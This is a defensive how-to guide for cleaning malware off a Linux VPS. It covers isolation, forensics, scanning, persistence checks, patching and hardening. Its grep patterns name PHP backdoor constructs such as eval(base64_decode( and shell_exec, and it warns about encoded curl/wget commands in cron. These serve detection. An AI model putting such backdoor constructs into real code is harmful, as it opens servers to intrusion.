Learn how to remove malware from a Linux VPS using structured incident response, advanced scanning, integrity checks, and server hardening best practices.
Malware incidents on a Linux VPS are not rare. They are usually the result of weak credentials, outdated packages, exposed services, or misconfigured applications. When an incident occurs, the response must be structured, calm, and technically sound. A rushed cleanup often leaves persistence mechanisms behind.
Prerequisites
Before we begin, ensure we have the following:
- An Linux Distro installed on dedicated server or KVM VPS.
- Basic Linux Command Line Knowledge.
Learn how to remove malware from a Linux VPS.
Step 1: Isolate the VPS Immediately
Before running random commands, we contain the risk.
If possible:
- Disable public access using cloud firewall rules or security groups.
- Restrict SSH access to a single trusted IP.
- Stop public-facing services temporarily (nginx, apache, node, etc.).
Example:
sudo systemctl stop nginx
sudo systemctl stop apache2
If the VPS is actively sending spam or participating in outbound attacks, block outgoing traffic at the provider firewall level.
Containment prevents reinfection during investigation.
Step 2: Do Not Reboot Immediately
Rebooting destroys volatile forensic evidence.
Instead, collect:
who
w
last -a
ss -tulnp
ps auxf
Check for:
- Unknown logged-in users
- Suspicious listening ports
- Processes running from /tmp, /dev/shm, or hidden directories
- High CPU usage from unknown binaries
Attackers often run malware from:
/tmp/
/var/tmp/
/dev/shm/
/home/*/.cache/
/usr/local/bin/ (unknown files)
Step 3: Check for Unauthorized Users and SSH Keys
List all users:
cat /etc/passwd
Look for unexpected system users with /bin/bash.
Check SSH keys:
cat /root/.ssh/authorized_keys
cat /home/*/.ssh/authorized_keys
Remove unknown public keys immediately.
Then rotate all passwords:
passwd root
If possible, disable password authentication entirely and enforce SSH key login.
Edit:
sudo nano /etc/ssh/sshd_config
Set:
PasswordAuthentication no
PermitRootLogin no
Restart SSH:
sudo systemctl restart sshd
Step 4: Identify Suspicious Processes
List top CPU consumers:
top
Or:
ps aux --sort=-%cpu | head
ps aux --sort=-%mem | head
Investigate unknown PIDs:
ls -l /proc/PID/exe
Validate file hash:
sha256sum /path/to/binary
Debian / Ubuntu
debsums -s
AlmaLinux / Rocky
sudo rpm -Va
Integrity verification ensures core binaries remain trusted.
If the executable points to /tmp or an unusual path, it is likely malicious.
Kill the process:
sudo kill -9 PID
Then remove the binary carefully.
Step 5: Scan the Server for Malware
Install modern scanning tools.
On Ubuntu / Debian:
sudo apt update
sudo apt install clamav rkhunter chkrootkit -y
On AlmaLinux / Rocky Linux:
sudo dnf install epel-release -y
sudo dnf install clamav rkhunter chkrootkit -y
Update ClamAV:
sudo freshclam
Run a full scan:
sudo clamscan -r -i /
Run rootkit scanners:
sudo rkhunter --check
sudo chkrootkit
Review logs carefully instead of deleting blindly.
Step 6: Inspect Cron Jobs and Systemd Persistence
Malware often persists using scheduled tasks.
Check cron:
crontab -l
sudo ls -al /etc/cron*
Look for encoded commands, curl/wget downloads, or base64 strings.
Check systemd services:
systemctl list-unit-files --type=service
Inspect suspicious services:
sudo systemctl status suspicious.service
Remove unknown services:
sudo systemctl disable suspicious.service
sudo rm /etc/systemd/system/suspicious.service
Reload systemd:
sudo systemctl daemon-reload
Step 7: Verify Web Application Integrity
If this VPS hosts a website:
Compare files against a clean backup.
Check for injected PHP backdoors like:
eval(base64_decode(
Search quickly:
grep -R "base64_decode" /var/www/
grep -R "shell_exec" /var/www/
grep -R "gzinflate" /var/www/
Remove unauthorized files and restore from verified backup.
If WordPress or CMS-based, update core, themes, and plugins immediately.
Step 8: Inspect Network Activity in Depth
Check real-time connections:
ss -antup
Install monitoring tools if required:
sudo apt install iftop nethogs -y
Monitor outbound traffic:
sudo iftop
Validate no unusual external endpoints are being contacted.
Also inspect firewall rules:
sudo iptables -L -n -v
sudo nft list ruleset
Step 9: Update and Patch the Entire System
Most malware infections happen due to outdated software.
Run:
Ubuntu / Debian
sudo apt update && sudo apt upgrade -y
AlmaLinux / Rocky
sudo dnf update -y
Also verify:
uname -r
If kernel updates were installed, schedule a reboot after cleanup.
Step 10: Harden the VPS After Cleanup
Cleaning is not enough. Hardening prevents recurrence.
Install Firewall
Ubuntu:
sudo apt install ufw -y
sudo ufw allow OpenSSH
sudo ufw enable
AlmaLinux / Rocky:
sudo systemctl enable firewalld
sudo systemctl start firewalld
Install Fail2Ban
sudo apt install fail2ban -y
or
sudo dnf install fail2ban -y
Enable Automatic Security Updates (2026 best practice)
Ubuntu:
sudo apt install unattended-upgrades
Step 11: Consider Full Rebuild if Root Was Compromised
If root access was gained by the attacker, the safest approach is:
- Backup clean data only.
- Deploy a fresh VPS image.
- Patch fully.
- Restore application data carefully.
- Rotate all API keys, database passwords, SMTP credentials.
In enterprise environments, rebuilding is often faster and more secure than partial cleanup.
Step 12: Monitor for Recurrence
After bringing services online:
Monitor:
journalctl -xe
tail -f /var/log/auth.log
Track outbound traffic:
iftop
Watch for:
- Recreated cron jobs
- Reappearing binaries
- High outbound connections
Continuous monitoring is critical.
Final Recommendations
Malware removal on Linux VPS requires discipline, not panic. We isolate first, investigate carefully, remove persistence mechanisms, patch fully, and harden the environment.
For production systems handling customer data, rebuilding from a clean image is often the safest path.
Security is not a one-time fix. It is a continuous operational responsibility.
When we apply structured incident response, keep systems updated, restrict access properly, and monitor actively, Linux VPS environments remain highly secure and stable even under aggressive internet exposure.
